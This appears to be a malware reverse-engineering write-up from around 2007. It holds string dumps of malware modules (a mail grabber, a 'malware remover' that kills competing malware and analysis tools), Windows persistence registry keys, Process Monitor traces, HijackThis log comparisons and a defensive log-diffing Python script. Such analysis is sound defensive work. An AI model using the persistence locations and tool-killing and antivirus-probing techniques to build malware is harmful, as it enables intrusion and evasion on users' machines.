00012E48   10016248      0   Copyright © 2007
00012E76   10016276      0   LegalTrademarks
00012E9E   1001629E      0   OriginalFilename
00012EC0   100162C0      0   ModHttpCommunication.DLL
00012EFA   100162FA      0   PrivateBuild
00012F1A   1001631A      0   ProductName
vtnr.gpg
CODE
0000D9B6   1000E5B6      0   ReadProcessMemory
0000D9CA   1000E5CA      0   GetCurrentProcess
0000DA5A   1000E65A      0   GetProcAddress
0000DA6C   1000E66C      0   GetModuleHandleA
0000DA80   1000E680      0   OutputDebugStringA
0000DA96   1000E696      0   FindClose
0000DAA2   1000E6A2      0   FindNextFileA
0000DAB2   1000E6B2      0   Sleep
0000DABA   1000E6BA      0   FindFirstFileA
0000DB3E   1000E73E      0   DeleteFileA
0000DB88   1000E788      0   Process32Next
0000DB98   1000E798      0   Process32First
0000DBAA   1000E7AA      0   CreateToolhelp32Snapshot
0000DBC6   1000E7C6      0   OpenProcess
0000DBD4   1000E7D4      0   TerminateProcess
0000DBE8   1000E7E8      0   GetExitCodeProcess
0000DBFE   1000E7FE      0   GetCurrentProcessId
0000DC14   1000E814      0   SuspendThread
0000DC24   1000E824      0   ResumeThread
0000DC34   1000E834      0   TerminateThread
0000DDA8   1000E9A8      0   GetDesktopWindow
0000DDBC   1000E9BC      0   GetWindowTextLengthA
0000DDD4   1000E9D4      0   IsWindowVisible
0000DDE6   1000E9E6      0   GetWindowThreadProcessId
0000DE02   1000EA02      0   EnumWindows
0000DFA4   1000EBA4      0   CertNameToStrA
0000DFB4   1000EBB4      0   CRYPT32.dll
0000E354   1000F154      0   \internet explorer
0000E368   1000F168      0   ProgramFilesDir
0000E378   1000F178      0   SOFTWARE\Microsoft\Windows\CurrentVersion
0000E3A4   1000F1A4      0   NtRenameKey
0000E3B0   1000F1B0      0   ntdll.dll
0000E3BC   1000F1BC      0   UMH::SCANABORTED
0000E3D0   1000F1D0      0   FOLDER BANNED
0000E400   1000F200      0   \InprocServer32
0000E410   1000F210      0   CLSID\
0000E42C   1000F22C      0   \systemroot
0000E44C   1000F24C      0   deleting: %s:%s
0000E45C   1000F25C      0   PackedCatalogItem
0000E470   1000F270      0   LibraryPath
0000E47C   1000F27C      0   \Catalog_Entries\
0000E490   1000F290      0   \Catalog_Entries
0000E4A4   1000F2A4      0   System\CurrentControlSet\Services\Winsock2\Parameters
0000E4DC   1000F2DC      0   Num_Catalog_Entries
0000E4F8   1000F2F8      0   Current_Protocol_Catalog
0000E514   1000F314      0   Current_NameSpace_Catalog
0000E530   1000F330      0   SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
0000E568   1000F368      0   AppInit_DLLs
0000E578   1000F378      0   SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\*
0000E5C4   1000F3C4      0   Debugger
0000E5D0   1000F3D0      0   SOFTWARE\Microsoft\Internet Explorer\Extensions\*
0000E60C   1000F40C      0   SOFTWARE\Microsoft\Internet Explorer\Toolbar
0000E63C   1000F43C      0   SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\*
0000E688   1000F488      0   SYSTEM\CurrentControlSet\Services\*
0000E6AC   1000F4AC      0   ImagePath
0000E6B8   1000F4B8      0   SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\*
0000E6F8   1000F4F8      0   DllName
0000E700   1000F500      0   SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
0000E740   1000F540      0   SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
0000E77C   1000F57C      0   SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
0000E7B0   1000F5B0      0   SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
0000E7E4   1000F5E4      0   SOFTWARE\Microsoft\Windows\CurrentVersion\Run
0000E814   1000F614      0   Shell
0000E81C   1000F61C      0   SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
0000E854   1000F654      0   UserInit
0000E860   1000F660      0   WTHelperGetProvSignerFromChain
0000E880   1000F680      0   WTHelperProvDataFromStateData
0000E8A0   1000F6A0      0   CryptCATAdminReleaseCatalogContext
0000E8C4   1000F6C4      0   CryptCATCatalogInfoFromContext
0000E8E4   1000F6E4      0   CryptCATAdminReleaseContext
0000E900   1000F700      0   CryptCATAdminEnumCatalogFromHash
0000E924   1000F724      0   CryptCATAdminCalcHashFromFileHandle
0000E948   1000F748      0   CryptCATAdminAcquireContext
0000E964   1000F764      0   WinVerifyTrust
0000E974   1000F774      0   wintrust.dll
0000EA14   1000F814      0   DbgUiStopDebugging
0000EA28   1000F828      0   DbgUiDebugActiveProcess
0000EA40   1000F840      0   DbgUiConnectToDbg
0000EA54   1000F854      0   ZwQueryInformationProcess
0000EA70   1000F870      0   ZwQuerySystemInformation
0000EA8C   1000F88C      0   SeDebugPrivilege
0000EAA8   1000F8A8      0   CompanyName
0000EAB4   1000F8B4      0   LegalCopyright
0000EAC4   1000F8C4      0   FileVersion
0000EAD0   1000F8D0      0   ProductVersion
0000EAE0   1000F8E0      0   InternalName
0000EAF0   1000F8F0      0   FileDescription
0000EB54   1000F954      0   %SYSTEMROOT%\system32\rsvpsp.dll
0000EB78   1000F978      0   %SYSTEMROOT%\system32\winrnr.dll
0000EB9C   1000F99C      0   %SYSTEMROOT%\system32\mswsock.dll
0000EBC0   1000F9C0      0   %PROGRAMFILES%\internet explorer\iexplore.exe
0000EBF0   1000F9F0      0   %PROGRAMFILES%\messenger\msmsgs.exe
0000EC14   1000FA14      0   %SYSTEMROOT%\explorer.exe
0000EC30   1000FA30      0   %SYSTEMROOT%\system32\cmd.exe
0000EC50   1000FA50      0   %SYSTEMROOT%\system32\wscntfy.exe
0000EC74   1000FA74      0   %SYSTEMROOT%\system32\alg.exe
0000EC94   1000FA94      0   %SYSTEMROOT%\system32\ctfmon.exe
0000ECB8   1000FAB8      0   %SYSTEMROOT%\system32\nvsvc32.exe
0000ECDC   1000FADC      0   %SYSTEMROOT%\system32\spoolsv.exe
0000ED00   1000FB00      0   %SYSTEMROOT%\system32\svchost.exe
0000ED24   1000FB24      0   %SYSTEMROOT%\system32\lsass.exe
0000ED44   1000FB44      0   %SYSTEMROOT%\system32\services.exe
0000ED68   1000FB68      0   %SYSTEMROOT%\system32\winlogon.exe
0000ED8C   1000FB8C      0   %SYSTEMROOT%\system32\csrss.exe
0000EDAC   1000FBAC      0   %SYSTEMROOT%\system32\smss.exe
0000EDCC   1000FBCC      0   rundll32.exe
0000EDDC   1000FBDC      0   documents and settings
0000EDF4   1000FBF4      0   microsoft
0000EE00   1000FC00      0   svchost.exe
0000EE0C   1000FC0C      0   iexplore.exe
0000EE1C   1000FC1C      0   %SYSTEMROOT%\system32\userinit.exe
0000EE70   1000FC70      0   %SYSTEMROOT%\system32\rundll32.exe
0000EE94   1000FC94      0   ashmaisv.exe
0000EEA4   1000FCA4      0   microsoft security adviser
0000EEC0   1000FCC0      0   jusched.exe
0000EECC   1000FCCC      0   %PROGRAMFILES%\skype\phone\skype.exe
0000EEF4   1000FCF4      0   %PROGRAMFILES%\belkin\belkin wireless network utility\wlservice.exe
0000EF44   1000FD44      0   NotifyServer
0000EF70   1000FD70      0   Stack:
0000EFD2   1000FDD2      0   Registers dump:
0000EFE4   1000FDE4      0   CPUInfo:Count:%u Type:%u
0000F000   1000FE00      0   MemInfo:TotalMem:%uMB VirtAvail:%uMB PhysAvail:%uMB MemLoad:%u%%
0000F044   1000FE44      0   Country:%s OS info: MajorVersion:%u MinorVersion:%u BuildNum:%u
0000F08A   1000FE8A      0   GetTickCount(0x%.8X) GetCurrentThreadId(0x%.8X) GetLastError(0x%.8X)
0000F0D6   1000FED6      0   CS:0x%.8X DS:0x%.8X ES:0x%.8X GS:0x%.8X FS:0x%.8X SS:0x%.8X ExcptFlags=0x%.8X
0000F124   1000FF24      0   %sUnhandled Exception process:[%s] in module [%s] #0x%.8X at addr:0x%.8X
0000F16E   1000FF6E      0   EAX=0x%.8X EBX=0x%.8X ECX=0x%.8X EDX=0x%.8X ESI=%.8X EDI=%.8X EIP=%.8X ESP=%.8X EBP=%.8X EFL=%.8X
0000F1D0   1000FFD0      0   %suptime %u hours %u mins %u secs
0000F1F3   1000FFF3      0   ----------------------------------------
0000F220   10010020      0   host: %s; country: %s; ip:
0000F23C   1001003C      0   %SYSTEMROOT%\system32\drivers\atmapi.sys
0000F268   10010068      0   <white list empty>
0000F280   10010080      0   <black list empty>
0000F466   10012066      0   VS_VERSION_INFO
0000F4C2   100120C2      0   StringFileInfo
0000F4E6   100120E6      0   040904B0
0000F4FE   100120FE      0   CompanyName
0000F51E   1001211E      0   FileDescription
0000F540   10012140      0   ModMalwareRemover DLL
0000F572   10012172      0   FileVersion
0000F58C   1001218C      0   1, 0, 0, 1
0000F5AA   100121AA      0   InternalName
0000F5C4   100121C4      0   ModMalwareRemover
0000F5EE   100121EE      0   LegalCopyright
0000F60C   1001220C      0   Copyright © 2007
0000F63A   1001223A      0   LegalTrademarks
0000F662   10012262      0   OriginalFilename
0000F684   10012284      0   ModMalwareRemover.DLL
0000F6B6   100122B6      0   ProductName
0000F6D0   100122D0      0   ModMalwareRemover Dynamic Link Library
0000F726   10012326      0   ProductVersion
0000F744   10012344      0   1, 0, 0, 1
0000F762   10012362      0   VarFileInfo
0000F782   10012382      0   Translation
mmg.cn
CODE
00003340   10004B40      0   ModMailGrabber.dll
0000337E   10004B7E      0   OnKernelEventReceived
00003C78   10005878      0   ModMailGrabber
00003C88   10005888      0   i think we are found SMTP outoing mail
00003CB0   100058B0      0   rcpt bcc:
00003CBC   100058BC      0   rcpt to:
00003CCC   100058CC      0   Making notify with theese mails
00003CF4   100058F4      0   Senging mails
00003D04   10005904      0   CheckMailList
00003D14   10005914      0   NotifyServer
00003D28   10005928      0   ModuleStartup Occured
00003D40   10005940      0   BcmdCode==2 Calling STOP Sniffing
00003D64   10005964      0   BcmdCode==1 Calling START Sniffing
00003D88   10005988      0   RECVD::DATA =
00003D98   10005998      0   Recvng Mail to Unduplicate
00003DB4   100059B4      0   Notify from ModuleID 1
00003DCC   100059CC      0   ClosingKernelEvent RECVD
00003DE8   100059E8      0   MODULE_UNLOADREQ..UnloadingModule
00003E10   10005A10      0   OnKernelEventReceived called
00003E34   10005A34      0   .log.htm
00003E40   10005A40      0   main.log.htm
00003E58   10005A58      0   <font size=%s><font color=%s>%s -> </font><font color=%s size+%s> %s</font></font>
00003EAC   10005AAC      0   Notice
00003EB8   10005AB8      0   green
00003EC0   10005AC0      0   Warning!
00003ED0   10005AD0      0   "#DA8E03"
00003EDC   10005ADC      0   ERROR
00003EEC   10005AEC      0   TempData
00003F08   10005B08      0   <font color=navy>(%s)::</font> <font color=green>%.2d:%.2d:%.2d</font> / <font color=brown>GetTickCount(%08u);GetCurrentThreadId(%08x);</font> TEXT(%s)
00003FA0   10005BA0      0   (%s):: %.2d:%.2d:%.2d / GetTickCount(%08u);GetCurrentThreadId(%08x); TEXT(%s)

Test


I’ve spent most of the weekend trying to assemble the pieces of the puzzle. While winlogon.exe activity is rather limited on an idle and clean computer, I got a 154 MB log in 30 minutes with this bugger installed, using filters in Process Monitor.

Normal winlogon.exe activity looks like this:

QUOTE
winlogon.exe Thread Create SUCCESS Thread ID: 248
winlogon.exe RegOpenKey HKCU SUCCESS Desired Access: Read
winlogon.exe RegOpenKey HKCU\AppEvents\Schemes\Apps\.Default\Maximize\.Current SUCCESS Desired Access: Read
winlogon.exe RegQueryValue HKCU\AppEvents\Schemes\Apps\.Default\Maximize\.Current\(Default) SUCCESS Type: REG_SZ, Length: 2, Data:
winlogon.exe RegCloseKey HKCU\AppEvents\Schemes\Apps\.Default\Maximize\.Current SUCCESS
winlogon.exe RegCloseKey HKCU SUCCESS
winlogon.exe RegOpenKey HKCU SUCCESS Desired Access: Read
winlogon.exe RegOpenKey HKCU\AppEvents\Schemes\Apps\.Default\Maximize\.Current\Active NAME NOT FOUND Desired Access: Read
winlogon.exe RegQueryValue HKCU\(Default) NAME NOT FOUND Length: 536
winlogon.exe RegCloseKey HKCU SUCCESS
winlogon.exe RegOpenKey HKLM\Software\Microsoft\Windows\CurrentVersion SUCCESS Desired Access: Read
winlogon.exe RegOpenKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Software\Microsoft\Windows\CurrentVersion NAME NOT FOUND Desired Access: Read
winlogon.exe RegQueryValue HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MediaPath SUCCESS Type: REG_SZ, Length: 34, Data: C:\WINDOWS\Media
winlogon.exe RegCloseKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion SUCCESS
winlogon.exe Thread Exit SUCCESS User Time: 0.0000000, Kernel Time: 0.0000000
18.exe has 2 resources: nvrsma.dll (which poses as an Nvidia driver / language pack) and a rootkit cleaner. The file carries a list of existing rootkits.
As I suspected vtnr.gpg of cleaning out / resetting stuff upon reboot, I decided to install some malware first: a banker, a search engine hijacker, an LSP hijacker, the winlogon + deflib.sys rootkit and the ntos rootkit. Unfortunately 18.exe did not install with ntos on board; I had to remove it myself prior to the 18.exe install, but I did leave the entry under the userinit key (it gives an error upon reboot, but the PC does start).

I also installed AVG Anti-Spyware, SpywareBlaster and Spybot Search & Destroy, since several program strings are mentioned in axt.hpl.

Hijackthis Before install:

QUOTE
Logfile of Trend Micro HijackThis v2.0.2
Boot mode: Normal

F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,
O2 - BHO: Google Module - {B87D203B-B43D-4af9-9E1B-9C20478CBB74} - tardm2.dll (file missing)
O2 - BHO: e404 helper - {F10587E9-0E47-4CBE-84AE-7DD20B8684BB} - C:\Program Files\Helper\superfinderusa.dll
O4 - HKLM\..\Run: [VMUserServices] C:\Program Files\Virtual Machine Additions\vmusrvc.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Firewall auto setup] C:\DOCUME~1\KLY\LOCALS~1\Temp\winlogon.exe
O4 - HKUS\S-1-5-18\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'Default user')
O10 - Unknown file in Winsock LSP: wsock3.dll
O10 - Unknown file in Winsock LSP: wsock3.dll
O10 - Unknown file in Winsock LSP: wsock3.dll
O10 - Unknown file in Winsock LSP: wsock3.dll
O23 - Service: Virtual Machine Additions Services Application (1-vmsrvc) - Microsoft Corporation - C:\Program Files\Virtual Machine Additions\vmsrvc.exe
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
After:

QUOTE
Logfile of Trend Micro HijackThis v2.0.2
Boot mode: Normal

F2 - REG:system.ini: Shell=c:\windows\explorer.exe
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe
O2 - BHO: e404 helper - {F10587E9-0E47-4CBE-84AE-7DD20B8684BB} - C:\Program Files\Helper\superfinderusa.dll
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Firewall auto setup] C:\DOCUME~1\KLY\LOCALS~1\Temp\winlogon.exe
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
Note: I left out unrelated entries in the HJT logs.

As you can see, some things got wiped out. vtnr.gpg removed a BHO and the hijacked Winsock LSP and reset the F2 values, but it also destroyed all services related to my VM. Previous versions also killed several other O4 entries (MSN Messenger included), and their associated processes got killed. Although 18.exe has that rootkit cleaning program as a resource, it wasn’t able to clean out the winlogon + deflib.sys rootkit. A bug or still an inactive feature … I haven’t got the slightest idea. The resource didn’t get dropped on the computer, that’s for sure.
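Comparing the two HijackThis logs by eye is how the post spots what vtnr.gpg wiped. The script below is an added example (not the poster's code) that does the same comparison mechanically: it groups HJT entries by section code, reports what was removed and added per section, and, because UserInit is a comma-separated list rather than a single program, splits that F2 value so a dropped component shows up as such rather than as a whole line removed and re-added. The two logs embedded in it are constructed by trimming the before/after logs quoted above; the script makes no judgement about which removed entries were malware and which were collateral (the VM services here), that remains the analyst's call.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed input: trimmed copies of the two HijackThis logs quoted in the post.
HJT_BEFORE = r"""
Logfile of Trend Micro HijackThis v2.0.2
Boot mode: Normal

F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,
O2 - BHO: Google Module - {B87D203B-B43D-4af9-9E1B-9C20478CBB74} - tardm2.dll (file missing)
O2 - BHO: e404 helper - {F10587E9-0E47-4CBE-84AE-7DD20B8684BB} - C:\Program Files\Helper\superfinderusa.dll
O4 - HKLM\..\Run: [VMUserServices] C:\Program Files\Virtual Machine Additions\vmusrvc.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [Firewall auto setup] C:\DOCUME~1\KLY\LOCALS~1\Temp\winlogon.exe
O4 - HKUS\S-1-5-18\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'SYSTEM')
O10 - Unknown file in Winsock LSP: wsock3.dll
O10 - Unknown file in Winsock LSP: wsock3.dll
O23 - Service: Virtual Machine Additions Services Application (1-vmsrvc) - Microsoft Corporation - C:\Program Files\Virtual Machine Additions\vmsrvc.exe
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
"""

HJT_AFTER = r"""
Logfile of Trend Micro HijackThis v2.0.2
Boot mode: Normal

F2 - REG:system.ini: Shell=c:\windows\explorer.exe
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe
O2 - BHO: e404 helper - {F10587E9-0E47-4CBE-84AE-7DD20B8684BB} - C:\Program Files\Helper\superfinderusa.dll
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [Firewall auto setup] C:\DOCUME~1\KLY\LOCALS~1\Temp\winlogon.exe
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
"""

# An HJT entry is "<section code> - <body>", e.g. "O4 - HKLM\..\Run: [...] ..."
ENTRY = re.compile(r"^(?P<section>[A-Z]\d+) - (?P<body>.+)$")
F2_VALUE = re.compile(r"^REG:system\.ini: (?P<key>\w+)=(?P<value>.*)$")


def parse_hjt(log: str) -> Dict[str, Set[str]]:
    """Group entries by section code; repeated lines (the four O10s) collapse to one."""
    entries: Dict[str, Set[str]] = defaultdict(set)
    for line in log.splitlines():
        m = ENTRY.match(line.strip())
        if m:
            entries[m.group("section")].add(m.group("body"))
    return entries


def diff_hjt(before: str, after: str) -> Dict[str, Dict[str, List[str]]]:
    """Per section: entries present only before (removed) or only after (added)."""
    b, a = parse_hjt(before), parse_hjt(after)
    out: Dict[str, Dict[str, List[str]]] = {"removed": {}, "added": {}}
    for section in sorted(set(b) | set(a)):
        removed = sorted(b[section] - a[section])
        added = sorted(a[section] - b[section])
        if removed:
            out["removed"][section] = removed
        if added:
            out["added"][section] = added
    return out


def f2_values(log: str) -> Dict[str, str]:
    """Key/value pairs from the F2 (system.ini / Winlogon) lines, keys lower-cased."""
    vals: Dict[str, str] = {}
    for body in parse_hjt(log).get("F2", ()):
        m = F2_VALUE.match(body)
        if m:
            vals[m.group("key").lower()] = m.group("value")
    return vals


def userinit_programs(value: str) -> List[str]:
    """UserInit is a comma-separated list; Windows starts every program in it."""
    return [p.strip().lower() for p in value.split(",") if p.strip()]


def userinit_diff(before: str, after: str) -> Tuple[List[str], List[str]]:
    """(programs dropped from UserInit, programs added to it)."""
    b = userinit_programs(f2_values(before).get("userinit", ""))
    a = userinit_programs(f2_values(after).get("userinit", ""))
    return [p for p in b if p not in a], [p for p in a if p not in b]


if __name__ == "__main__":
    for kind, sections in diff_hjt(HJT_BEFORE, HJT_AFTER).items():
        for section, entries in sections.items():
            for e in entries:
                print(f"{kind:8} {section:4} {e}")
    print("UserInit dropped/added:", userinit_diff(HJT_BEFORE, HJT_AFTER))
```

On the sample, the removed set is the Google Module BHO, both VM entries (the O4 and the O23 service), the HKUS ntos.exe Run value and the wsock3.dll LSP; the only UserInit change is the disappearance of ntos.exe. The script is format-specific to HJT v2 logs and ignores everything that does not look like `<code> - <body>`.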

Notes


Once axt.hpl and vtnr.gpg are dropped (they are 2 resources of nvrsma.dll), a system scan is performed. Several registry keys are enumerated: Internet settings, Internet Zone settings, DNS cache and TCP/IP parameters, 1 level of the complete HKLM\Software key, to name only a few.

QUOTE
winlogon.exe RegEnumKey HKLM\SOFTWARE SUCCESS Index: 1, Name: 2
winlogon.exe RegOpenKey HKLM\Software\2 SUCCESS Desired Access: All Access
winlogon.exe RegCloseKey HKLM\SOFTWARE\2 SUCCESS
winlogon.exe RegEnumKey HKLM\SOFTWARE SUCCESS Index: 2, Name: AutoIt v3
winlogon.exe RegOpenKey HKLM\Software\AutoIt v3 SUCCESS Desired Access: All Access
winlogon.exe RegCloseKey HKLM\SOFTWARE\AutoIt v3 SUCCESS
winlogon.exe RegEnumKey HKLM\SOFTWARE SUCCESS Index: 3, Name: C07ft5Y
winlogon.exe RegOpenKey HKLM\Software\C07ft5Y SUCCESS Desired Access: All Access
winlogon.exe RegCloseKey HKLM\SOFTWARE\C07ft5Y SUCCESS
winlogon.exe RegEnumKey HKLM\SOFTWARE SUCCESS Index: 4, Name: Classes
etc ....
In the strings of axt.hpl, we notice the presence of several anti-spyware and antivirus products. The module simply checks for their presence on the computer. No keys are deleted and no programs are uninstalled.

QUOTE
winlogon.exe RegOpenKey HKLM\Software\KasperskyLab SUCCESS Desired Access: Read
winlogon.exe RegCloseKey HKLM\SOFTWARE\KasperskyLab SUCCESS
winlogon.exe RegOpenKey HKLM\Software\McAfee\VirusScan SUCCESS Desired Access: Read
winlogon.exe RegCloseKey HKLM\SOFTWARE\McAfee\VirusScan SUCCESS
winlogon.exe RegOpenKey HKLM\Software\Symantec\Symantec AntiVirus NAME NOT FOUND Desired Access: Read
winlogon.exe RegOpenKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ClamAV NAME NOT FOUND Desired Access: Read
winlogon.exe RegOpenKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AntiVir PersonalEdition Classic NAME NOT FOUND Desired Access: Read
etc ....
axt.hpl also sends out spam, as we saw earlier. Temporary Internet Files folders are used to store *.htm documents. Once processed, the module cleans up the TIF files so that no traces remain.

vtnr.gpg fixes the registry keys. For Run keys it checks whether the program really exists on the HDD. It also enumerates the C:\Documents and Settings\All Users\Start Menu\Programs\Startup and C:\Documents and Settings\[user name]\Start Menu\Programs\Startup folders.

QUOTE
winlogon.exe IRP_MJ_CREATE C:\Documents and Settings\All Users\Start Menu\Programs\Startup SUCCESS Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-alert, Attributes: n/a, ShareMode: Read, Write, AllocationSize: n/a, OpenResult: Opened
winlogon.exe IRP_MJ_DIRECTORY_CONTROL C:\Documents and Settings\All Users\Start Menu\Programs\Startup\* SUCCESS Type: QueryDirectory, Filter: *, 2: .
winlogon.exe IRP_MJ_DIRECTORY_CONTROL C:\Documents and Settings\All Users\Start Menu\Programs\Startup SUCCESS Type: QueryDirectory, 1: .., 2: desktop.ini
winlogon.exe IRP_MJ_DIRECTORY_CONTROL C:\Documents and Settings\All Users\Start Menu\Programs\Startup NO MORE FILES Type: QueryDirectory
winlogon.exe IRP_MJ_CLEANUP C:\Documents and Settings\All Users\Start Menu\Programs\Startup SUCCESS
winlogon.exe IRP_MJ_CLOSE C:\Documents and Settings\All Users\Start Menu\Programs\Startup SUCCESS
Below you can clearly see it changing the Shell and Userinit values using RegSetValue.

QUOTE
winlogon.exe RegOpenKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SUCCESS Desired Access: All Access
winlogon.exe RegCloseKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows SUCCESS
winlogon.exe RegQueryValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell SUCCESS Type: REG_SZ, Length: 26, Data: Explorer.exe
winlogon.exe RegQueryValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell SUCCESS Type: REG_SZ, Length: 26, Data: Explorer.exe
winlogon.exe RegSetValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell SUCCESS Type: REG_SZ, Length: 48, Data: c:\windows\explorer.exe
winlogon.exe IRP_MJ_SET_INFORMATION C:\WINDOWS\system32\config\software.LOG SUCCESS Type: SetEndOfFileInformationFile, EndOfFile: 20,480
winlogon.exe IRP_MJ_SET_INFORMATION C:\WINDOWS\system32\config\software.LOG SUCCESS Type: SetEndOfFileInformationFile, EndOfFile: 24,576
winlogon.exe RegOpenKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SUCCESS Desired Access: All Access
winlogon.exe RegCloseKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SUCCESS
winlogon.exe RegQueryValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit SUCCESS Type: REG_SZ, Length: 68, Data: C:\WINDOWS\system32\userinit.exe,
winlogon.exe RegQueryValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit SUCCESS Type: REG_SZ, Length: 68, Data: C:\WINDOWS\system32\userinit.exe,
winlogon.exe RegSetValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit SUCCESS Type: REG_SZ, Length: 66, Data: c:\windows\system32\userinit.exe
winlogon.exe Thread Exit SUCCESS User Time: 0.7711088, Kernel Time: 1.2718288
The module also enumerates all services installed on the computer by querying the HKLM\System\CurrentControlSet key. For certain services a FileExists is also performed.

QUOTE
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 0, Name: 1-driver-vmsrvc
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 1, Name: 1-vmsrvc
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 2, Name: Abiosdsk
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 3, Name: abp480n5
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 4, Name: ACPI
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 5, Name: ACPIEC
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 6, Name: adpu160m
winlogon.exe RegEnumKey HKLM\System\CurrentControlSet\Services SUCCESS Index: 7, Name: aec
etc ....
Earlier I mentioned that some programs are killed when running. In the excerpt below HijackThis gets killed after the following requests:

QUOTE
winlogon.exe IRP_MJ_CREATE C:\Tools\hijackthis.exe SUCCESS Desired Access: Generic Read, Disposition: Open, Options: Synchronous IO Non-alert, Non-Directory File, Attributes: n/a, ShareMode: Read, Delete, AllocationSize: n/a, OpenResult: Opened
winlogon.exe FASTIO_ACQUIRE_FOR_SECTION_SYNCHRONIZATION C:\Tools\HiJackThis.exe SUCCESS SyncType: SyncTypeCreateSection, PageProtection: PAGE_READONLY
winlogon.exe FASTIO_QUERY_INFORMATION C:\Tools\HiJackThis.exe SUCCESS Type: QueryStandardInformationFile, AllocationSize: 405,504, EndOfFile: 401,720, NumberOfLinks: 1, DeletePending: False, Directory: False
winlogon.exe FASTIO_RELEASE_FOR_SECTION_SYNCHRONIZATION C:\Tools\HiJackThis.exe SUCCESS
winlogon.exe FASTIO_ACQUIRE_FOR_SECTION_SYNCHRONIZATION C:\Tools\HiJackThis.exe SUCCESS SyncType: SyncTypeOther
winlogon.exe FASTIO_RELEASE_FOR_SECTION_SYNCHRONIZATION C:\Tools\HiJackThis.exe SUCCESS
winlogon.exe IRP_MJ_CLEANUP C:\Tools\HiJackThis.exe SUCCESS
winlogon.exe IRP_MJ_CLOSE C:\Tools\HiJackThis.exe SUCCESS
HiJackThis.exe Thread Exit SUCCESS User Time: 0.1702448, Kernel Time: 0.4406336
HiJackThis.exe Process Exit SUCCESS Exit Status: 259, User Time: 0.1802592, Kernel Time: 0.3705328
HiJackThis.exe IRP_MJ_CLEANUP C:\Tools SUCCESS
HiJackThis.exe IRP_MJ_CLOSE C:\Tools SUCCESS
HiJackThis.exe IRP_MJ_CLEANUP C:\Documents and Settings\KLY\Local Settings\Temp\~DFD6FC.tmp SUCCESS
HiJackThis.exe IRP_MJ_CLEANUP C:\WINDOWS\system32\msvbvm60.dll SUCCESS
HiJackThis.exe IRP_MJ_CLEANUP C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9 SUCCESS
